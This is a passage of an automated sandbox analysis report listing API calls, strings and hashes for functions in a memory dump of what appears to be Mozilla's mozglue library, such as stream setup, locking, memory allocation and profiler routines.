                                                                                                                                                          • Part of subcall function 6B08BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6B0D7A3F), ref: 6B08BF5D
                                                                                                                                                          • Part of subcall function 6B08BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6B0D7A3F), ref: 6B08BF7E
                                                                                                                                                        • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6B0D7A48
                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6B0D7A7A
                                                                                                                                                          • Part of subcall function 6B089830: free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B
                                                                                                                                                        • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6B0D7AC0
                                                                                                                                                        • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0D7AC8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3421697164-0
                                                                                                                                                        • Opcode ID: ec0d46005f4b0d75d76b5b8eb0bf7cfdc1ffa6d54aac1124b106af42af3f6a76
                                                                                                                                                        • Instruction ID: 428ebea4e56b0e47f1b74902560739680150c8c21a442bd38d2b34da2f5ab076
                                                                                                                                                        • Opcode Fuzzy Hash: ec0d46005f4b0d75d76b5b8eb0bf7cfdc1ffa6d54aac1124b106af42af3f6a76
                                                                                                                                                        • Instruction Fuzzy Hash: E02130356043049FCB18DF28E899A9EBFE5FF89314F04481DE94687355DB34E909CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B08BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6B0D7A3F), ref: 6B08BF11
                                                                                                                                                          • Part of subcall function 6B08BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6B0D7A3F), ref: 6B08BF5D
                                                                                                                                                          • Part of subcall function 6B08BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6B0D7A3F), ref: 6B08BF7E
                                                                                                                                                        • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6B0D7968
                                                                                                                                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6B0DA264,6B0DA264), ref: 6B0D799A
                                                                                                                                                          • Part of subcall function 6B089830: free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B
                                                                                                                                                        • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6B0D79E0
                                                                                                                                                        • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0D79E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3421697164-0
                                                                                                                                                        • Opcode ID: 2660d0d2ef24719961757095adc698d589c0963dbe843bcee1daf38744824a83
                                                                                                                                                        • Instruction ID: 0a2c0d8162b4a0831a37d2d457ff14d71a46686fcb8b869be6722e12f3eb72fc
                                                                                                                                                        • Opcode Fuzzy Hash: 2660d0d2ef24719961757095adc698d589c0963dbe843bcee1daf38744824a83
                                                                                                                                                        • Instruction Fuzzy Hash: 1C2130356043049FCB18DF28D889A9EBFE5FF89354F04881DE94687355DB34E909CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0DAAF8
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF770,?,6B09BF9F), ref: 6B0DAB08
                                                                                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB39
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF770,?,?,?,?,?,?,?,?,6B09BF9F), ref: 6B0DAB6B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1951318356-0
                                                                                                                                                        • Opcode ID: 76747bf957bc97bfbfd771efffda946c7847f1d8db024eb0d1178372bd970531
                                                                                                                                                        • Instruction ID: a23d060e9a32eb2157bacc95acde43a4d58971cd06afbef99e9efa034cb0c475
                                                                                                                                                        • Opcode Fuzzy Hash: 76747bf957bc97bfbfd771efffda946c7847f1d8db024eb0d1178372bd970531
                                                                                                                                                        • Instruction Fuzzy Hash: 281130B5A012099FCF04DFA8E88599FBFB9FF493147044429E90697301E734E909CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C205B
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6B0C201B,?,?,?,?,?,?,?,6B0C1F8F,?,?), ref: 6B0C2064
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0C208E
                                                                                                                                                        • free.MOZGLUE(?,?,?,00000000,?,6B0C201B,?,?,?,?,?,?,?,6B0C1F8F,?,?), ref: 6B0C20A3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                        • Opcode ID: dae0cc821ce540d514bdf3673ebae4d4d88d2985aad95548ff4cdad3926330f8
                                                                                                                                                        • Instruction ID: 5961d438abe32d4ec2a903902fe01ff949f4eefa1387869ac33348155be6d165
                                                                                                                                                        • Opcode Fuzzy Hash: dae0cc821ce540d514bdf3673ebae4d4d88d2985aad95548ff4cdad3926330f8
                                                                                                                                                        • Instruction Fuzzy Hash: 47F0B4751007009BC7159F16E88471BBFF9EF86324F10001AE90787711DB76E801CB96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEB11
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB1E
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6B0BEB3C
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BEB5B
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6B0BEC55
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6B0BEC5C
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_start, xrefs: 6B0BEBB4
                                                                                                                                                        • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
                                                                                                                                                        • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                        • API String ID: 2885072826-1186885292
                                                                                                                                                        • Opcode ID: f5efd961b1b3dbce1183398690afb0b2a721b4a53a1bffa8d016187fe50c809b
                                                                                                                                                        • Instruction ID: 1ec84c9ca2eab134c3731673cda179821a779c97fe836f333001fe6af7dff65e
                                                                                                                                                        • Opcode Fuzzy Hash: f5efd961b1b3dbce1183398690afb0b2a721b4a53a1bffa8d016187fe50c809b
                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0A731B022109FDB149F69F845B597FACABC2255F000069EE06D3340D779F446CB75
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C20B7
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,6B0AFBD1), ref: 6B0C20C0
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6B0AFBD1), ref: 6B0C20DA
                                                                                                                                                        • free.MOZGLUE(00000000,?,6B0AFBD1), ref: 6B0C20F1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                        • Opcode ID: 7a3a534b3821c646737b9ed3c2a4390303d4f4250fd8d451ccb7b30c9b11f2d5
                                                                                                                                                        • Instruction ID: 5ad461ec433cadded1c4a616664f6caf718279452bae4ec2a1651d294330f214
                                                                                                                                                        • Opcode Fuzzy Hash: 7a3a534b3821c646737b9ed3c2a4390303d4f4250fd8d451ccb7b30c9b11f2d5
                                                                                                                                                        • Instruction Fuzzy Hash: F4E0EC355006148BC2249F35A80464FBFEDFF862147110517E94783601D779E5418AD6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B079B2C
                                                                                                                                                        • memcpy.VCRUNTIME140(6B0799CF,00000000,?), ref: 6B079BB6
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B079BF8
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B079DE4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                        • Opcode ID: 268e56affa8926399110cdd80d6b445b20b284e46d5178c1e1e5d80b303de377
                                                                                                                                                        • Instruction ID: ad825e9a8b751b8472e091ebbb8e93916fe335983d9eecd622fece6ba53840d6
                                                                                                                                                        • Opcode Fuzzy Hash: 268e56affa8926399110cdd80d6b445b20b284e46d5178c1e1e5d80b303de377
                                                                                                                                                        • Instruction Fuzzy Hash: E1D16A71A0020A9FCB28CF68C981BAEFBF2FF88314F148529E915A7351D775AD11CB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0837F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6B0D145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6B08380A
                                                                                                                                                          • Part of subcall function 6B0B8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6B0D06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6B0B8DCC
                                                                                                                                                          • Part of subcall function 6B0C0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6B0C138F,?,?,?), ref: 6B0C0B80
                                                                                                                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6B0C138F,?,?,?), ref: 6B0C0B27
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6B0C138F,?,?,?), ref: 6B0C0B3F
                                                                                                                                                        Strings
                                                                                                                                                        • baseprofiler::profiler_capture_backtrace, xrefs: 6B0C0AB5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                                                                                                        • String ID: baseprofiler::profiler_capture_backtrace
                                                                                                                                                        • API String ID: 3592261714-147032715
                                                                                                                                                        • Opcode ID: f06ad58709bc73cf8c015f44fdab33fc0d5ac176ac6562d7761d38e303d405b6
                                                                                                                                                        • Instruction ID: 42f4ce537b6fae9856f35bf6b540e85f42ddc44ffa474867e7601849a49b0278
                                                                                                                                                        • Opcode Fuzzy Hash: f06ad58709bc73cf8c015f44fdab33fc0d5ac176ac6562d7761d38e303d405b6
                                                                                                                                                        • Instruction Fuzzy Hash: BD2191B4B042059BDB0CDFA4D891BBF7FBAAF85704F10046CD9159B241EB79A941CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • calloc.MOZGLUE(?,?), ref: 6B07F19B
                                                                                                                                                          • Part of subcall function 6B09D850: EnterCriticalSection.KERNEL32(?), ref: 6B09D904
                                                                                                                                                          • Part of subcall function 6B09D850: LeaveCriticalSection.KERNEL32(?), ref: 6B09D971
                                                                                                                                                          • Part of subcall function 6B09D850: memset.VCRUNTIME140(?,00000000,?), ref: 6B09D97B
                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6B07F209
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 3775194440-2564639436
                                                                                                                                                        • Opcode ID: e8f7d430e66c2a88c7df6cb80181b804c9fec9fa3166799a152de443144095ef
                                                                                                                                                        • Instruction ID: 55f5db5192b9a9a9f62892b7ff396660627e5bc32e0e135e0c89dcb97f760250
                                                                                                                                                        • Opcode Fuzzy Hash: e8f7d430e66c2a88c7df6cb80181b804c9fec9fa3166799a152de443144095ef
                                                                                                                                                        • Instruction Fuzzy Hash: 90115C32E0478997DB089F68D9512FEFFAEDF96218B01523DDC05AB212EB34D985C354
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                          • Part of subcall function 6B08CAB0: EnterCriticalSection.KERNEL32(?), ref: 6B08CB49
                                                                                                                                                          • Part of subcall function 6B08CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6B08CBB6
                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6B08CAA2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 3517139297-2564639436
                                                                                                                                                        • Opcode ID: 5393a8cbfb7582c7b49fee44ffa18ababcefe3c383f381f8858629233b67b16e
                                                                                                                                                        • Instruction ID: 9ee73cd738df11a194dbb4376e2d0bc782294b632a2e6318f20c0c46313be44b
                                                                                                                                                        • Opcode Fuzzy Hash: 5393a8cbfb7582c7b49fee44ffa18ababcefe3c383f381f8858629233b67b16e
                                                                                                                                                        • Instruction Fuzzy Hash: 63110231E0069893DF04DB68D8002BDBFB5EF96618F04835DDC49AB202EB34E6C5C380
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • realloc.MOZGLUE(?,?), ref: 6B091A6B
                                                                                                                                                          • Part of subcall function 6B091AF0: EnterCriticalSection.KERNEL32(?), ref: 6B091C36
                                                                                                                                                        • mozalloc_abort.MOZGLUE(?), ref: 6B091AE7
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                                                                                                        • String ID: d
                                                                                                                                                        • API String ID: 2670432147-2564639436
                                                                                                                                                        • Opcode ID: 28a6e473fc9e516cdd0ad2f54336166f90e5360db5830dc65094e63872642691
                                                                                                                                                        • Instruction ID: e98670359c1847e9924ba8bac51a6eeb49eeed60107fc638836cbc313f190796
                                                                                                                                                        • Opcode Fuzzy Hash: 28a6e473fc9e516cdd0ad2f54336166f90e5360db5830dc65094e63872642691
                                                                                                                                                        • Instruction Fuzzy Hash: 63112331E00268A3CB089BA8D8045AEBFB9EF95214F04965DDD495B202EB34E9C1C380
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6B0844B2,6B0FE21C,6B0FF7F8), ref: 6B08473E
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6B08474A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                        • String ID: GetNtLoaderAPI
                                                                                                                                                        • API String ID: 1646373207-1628273567
                                                                                                                                                        • Opcode ID: aaac3560549a6b9f08082e747fc7c9ff29793e079326c2291c5f475dcb185a80
                                                                                                                                                        • Instruction ID: a3c7d9c3bc319e3cd0d3ce4ffd78bf1ecb62dc928c9227c27dcf067b354db127
                                                                                                                                                        • Opcode Fuzzy Hash: aaac3560549a6b9f08082e747fc7c9ff29793e079326c2291c5f475dcb185a80
                                                                                                                                                        • Instruction Fuzzy Hash: FE010C75705218AFDF089F69D89871D7FEEEB8A351B054069ED05C7340DB78D9028FA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6B0F51C8), ref: 6B0D591A
                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 6B0D592B
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_SKELETON_UI_RESTARTING, xrefs: 6B0D5915
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
